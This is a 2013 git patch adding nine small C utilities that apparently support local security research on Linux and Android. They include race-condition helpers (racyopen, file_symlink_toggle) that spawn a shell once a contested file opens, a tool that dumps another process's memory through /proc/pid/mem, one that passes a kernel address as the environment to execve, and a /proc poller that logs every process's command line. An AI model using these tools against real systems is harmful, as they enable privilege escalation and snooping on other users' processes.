From 4646ef78ef5c9180d4c476924ddc6c0bd9dbc6e0 Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sun, 24 Nov 2013 03:01:00 +0100
Subject: [PATCH] put the files in a real repo

---
 tools/delayedreaddir.c      | 24 +++++++++++++++
 tools/evilenvexec.c         | 26 +++++++++++++++++
 tools/file_symlink_toggle.c | 16 ++++++++++
 tools/intdiff.c             | 14 +++++++++
 tools/racyopen.c            | 33 +++++++++++++++++++++
 tools/racyopen_simple.c     | 24 +++++++++++++++
 tools/spawnhunter.c         | 58 +++++++++++++++++++++++++++++++++++++
 tools/viewmem.c             | 48 ++++++++++++++++++++++++++++++
 tools/weirdargs.c           | 15 ++++++++++
 9 files changed, 258 insertions(+)
 create mode 100644 tools/delayedreaddir.c
 create mode 100644 tools/evilenvexec.c
 create mode 100644 tools/file_symlink_toggle.c
 create mode 100644 tools/intdiff.c
 create mode 100644 tools/racyopen.c
 create mode 100644 tools/racyopen_simple.c
 create mode 100644 tools/spawnhunter.c
 create mode 100644 tools/viewmem.c
 create mode 100644 tools/weirdargs.c

diff --git a/tools/delayedreaddir.c b/tools/delayedreaddir.c
new file mode 100644
index 0000000..cd7a736
--- /dev/null
+++ b/tools/delayedreaddir.c
@@ -0,0 +1,24 @@
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+  if (argc != 2) {
+    puts("invocation: ./delayedreaddir <dirpath>");
+    return 1;
+  }
+  DIR *d = opendir(argv[1]);
+  if (d == NULL) {
+    printf("error: can't open %s - %s\n", argv[1], strerror(errno));
+    return 1;
+  }
+  printf("please press the any key...\n");
+  while (getchar() != '\n');
+  struct dirent *dent;
+  while ((dent = readdir(d)) != NULL) {
+    printf("%s ", dent->d_name);
+  }
+  printf("\n");
+}
diff --git a/tools/evilenvexec.c b/tools/evilenvexec.c
new file mode 100644
index 0000000..aab4599
--- /dev/null
+++ b/tools/evilenvexec.c
@@ -0,0 +1,26 @@
+#include <errno.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdio.h>
+
+extern char **environ;
+
+int main2() {
+  printf("trying to read the first char of the environment...\n");
+  puts(*environ);
+  printf("char read: %c\n", **environ);
+  return 0;
+}
+
+int main1() {
+  char *newenv[] = {(char *)0xffffffff80008000, NULL};
+  char *argv[] = { "evilenvexec", "stage2", NULL };
+  execve("/proc/self/exe", argv, newenv);
+  printf("execve fail: %s\n", strerror(errno));
+  return 1;
+}
+
+int main(int argc, char *argv[]) {
+  if (argc == 2) return main2();
+  return main1();
+}
diff --git a/tools/file_symlink_toggle.c b/tools/file_symlink_toggle.c
new file mode 100644
index 0000000..7c61bc3
--- /dev/null
+++ b/tools/file_symlink_toggle.c
@@ -0,0 +1,16 @@
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+  if (argc != 4) return 1;
+  
+  char *filename = argv[1];
+  char *filename_ = argv[2];
+  char *linktarget = argv[3];
+  
+  while (1) {
+    link(filename_, filename);
+    unlink(filename);
+    symlink(linktarget, filename);
+    unlink(filename);
+  }
+}
diff --git a/tools/intdiff.c b/tools/intdiff.c
new file mode 100644
index 0000000..87f9b71
--- /dev/null
+++ b/tools/intdiff.c
@@ -0,0 +1,14 @@
+#include <stdio.h>
+
+int main(void) {
+  int n, n_;
+  scanf("%d", &n);
+  while (1) {
+    n_ = n;
+    if (scanf("%d", &n) != 1) {
+      perror("read failed");
+      return 1;
+    }
+    printf("%d\n", n-n_);
+  }
+}
diff --git a/tools/racyopen.c b/tools/racyopen.c
new file mode 100644
index 0000000..acb8d76
--- /dev/null
+++ b/tools/racyopen.c
@@ -0,0 +1,33 @@
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+  if (argc != 3) { puts("invocation: ./racyopen <folder> <fileprefix>"); exit(1); }
+
+  chdir(argv[1]);
+  DIR *dir = opendir(".");
+  int prefixlen = strlen(argv[2]);
+  while (1) {
+    struct dirent *dent;
+    while ((dent = readdir(dir)) != NULL) {
+      if (dent->d_name[0] == '.' && (dent->d_name[1] == '\0' || (dent->d_name[1] == '.' && dent->d_name[2] == '\0'))) continue;
+      if (strncmp(dent->d_name, argv[2], prefixlen) == 0) {
+        int fd = open(dent->d_name, O_RDWR);
+        if (fd == -1) {
+          printf("Saw a file (%s), but couldn't open it: %s\n", dent->d_name, strerror(errno));
+          continue;
+        }
+        printf("Success! Here's your shell with open fd.\n");
+        system("/bin/sh");
+        printf("\nshell exited, resuming race\n");
+      }
+    }
+    rewinddir(dir);
+  }
+}
diff --git a/tools/racyopen_simple.c b/tools/racyopen_simple.c
new file mode 100644
index 0000000..e4d5c06
--- /dev/null
+++ b/tools/racyopen_simple.c
@@ -0,0 +1,24 @@
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+  if (argc != 3) { puts("invocation: ./racyopen <folder> <file>"); exit(1); }
+
+  chdir(argv[1]);
+  while (1) {
+    int fd = open(argv[2], O_RDWR);
+    if (fd == -1) {
+      sched_yield();
+      continue;
+    }
+    printf("Success! Here's your shell with open fd.\n");
+    execl("/system/bin/sh", "sh", NULL);
+    printf("\nshell exited, resuming race\n");
+  }
+}
diff --git a/tools/spawnhunter.c b/tools/spawnhunter.c
new file mode 100644
index 0000000..6a1d059
--- /dev/null
+++ b/tools/spawnhunter.c
@@ -0,0 +1,58 @@
+// Try to print the cmdlines of all process spawns by polling /proc.
+
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dirent.h>
+#include <stdio.h>
+
+
+static unsigned int active[65536];
+
+// assumes that *str can't be empty
+static int str_to_int(char *str) {
+  unsigned int res = 0;
+  while (1) {
+    if (*str < '0' || *str > '9') return -1;
+    res += *str - '0';
+    str++;
+    if (*str == '\0') return res;
+    res *= 10;
+  }
+}
+
+int main(int argc, char *argv[]) {
+  for (int i=0; i<65536; i++) {
+    active[i] = 0;
+  }
+  
+  chdir("/proc");
+  DIR *dir = opendir(".");
+  unsigned int cycle = 2, lastcycle;
+  while (1) {
+    lastcycle = cycle-1;
+    struct dirent *dent;
+    char path[5+1+7+1];
+    while ((dent = readdir(dir)) != NULL) {
+      int name_id = str_to_int(dent->d_name);
+      if (name_id < 0 || name_id > 65535) continue;
+      if (active[name_id] != lastcycle) {
+        sprintf(path, "%s/cmdline", dent->d_name);
+        int fd = open(path, O_RDONLY);
+        if (fd != -1) {
+          char cmdline[65536];
+          int cmdline_len = read(fd, cmdline, 65536);
+          if (cmdline_len != -1) {
+            write(1, cmdline, cmdline_len);
+            write(1, "\n", 1);
+          }
+          close(fd);
+        }
+      }
+      active[name_id] = cycle;
+    }
+    rewinddir(dir);
+    cycle++;
+  }
+}
diff --git a/tools/viewmem.c b/tools/viewmem.c
new file mode 100644
index 0000000..ab00ef3
--- /dev/null
+++ b/tools/viewmem.c
@@ -0,0 +1,48 @@
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdlib.h>
+
+int main(int argc, char *argv[]) {
+  if (argc != 3) {
+    fputs("invocation: ./viewmem /proc/<pid>/mem <addr>\n", stderr);
+    return 1;
+  }
+  char *end;
+  errno = 0;
+  unsigned long long addr = strtoull(argv[2], &end, 0);
+  if (errno != 0 || *end != 0) {
+    fputs("invalid addr\n", stderr);
+    return 1;
+  }
+  int fd = open(argv[1], O_RDWR);
+  if (fd == -1) {
+    fprintf(stderr, "error: can't open %s - %s\n", argv[1], strerror(errno));
+    return 1;
+  }
+  fprintf(stderr, "please press the any key...\n");
+  fd = openat(fd, "", 0, O_RDWR);
+  while (getchar() != '\n');
+  fprintf(stderr, "trying to dump...");
+  errno = 0;
+  lseek(fd, addr, SEEK_SET);
+  if (errno != 0) {
+    fprintf(stderr, "lseek() failed: %s\n", strerror(errno));
+    return 1;
+  }
+  char buf[4096]; // nothing interesting has a different pagesize anyway
+  int i=0;
+  while (read(fd, buf, 4096) == 4096) {
+    write(1, buf, 4096);
+    i++;
+  }
+  fprintf(stderr, "read %i pages\n", i);
+  return 0;
+}
diff --git a/tools/weirdargs.c b/tools/weirdargs.c
new file mode 100644
index 0000000..e9cad62
--- /dev/null
+++ b/tools/weirdargs.c
@@ -0,0 +1,15 @@
+/*
+ * Execute a program with weird args (e.g. an argv[0] value that doesn't match
+ * the filename or argc=0).
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <string.h>
+
+int main(int argc, char *argv[]) {
+  execvp(argv[1], argv+2);
+  fprintf(stderr, "error: %s\n", strerror(errno));
+  return 1;
+}
\ No newline at end of file
-- 
2.20.1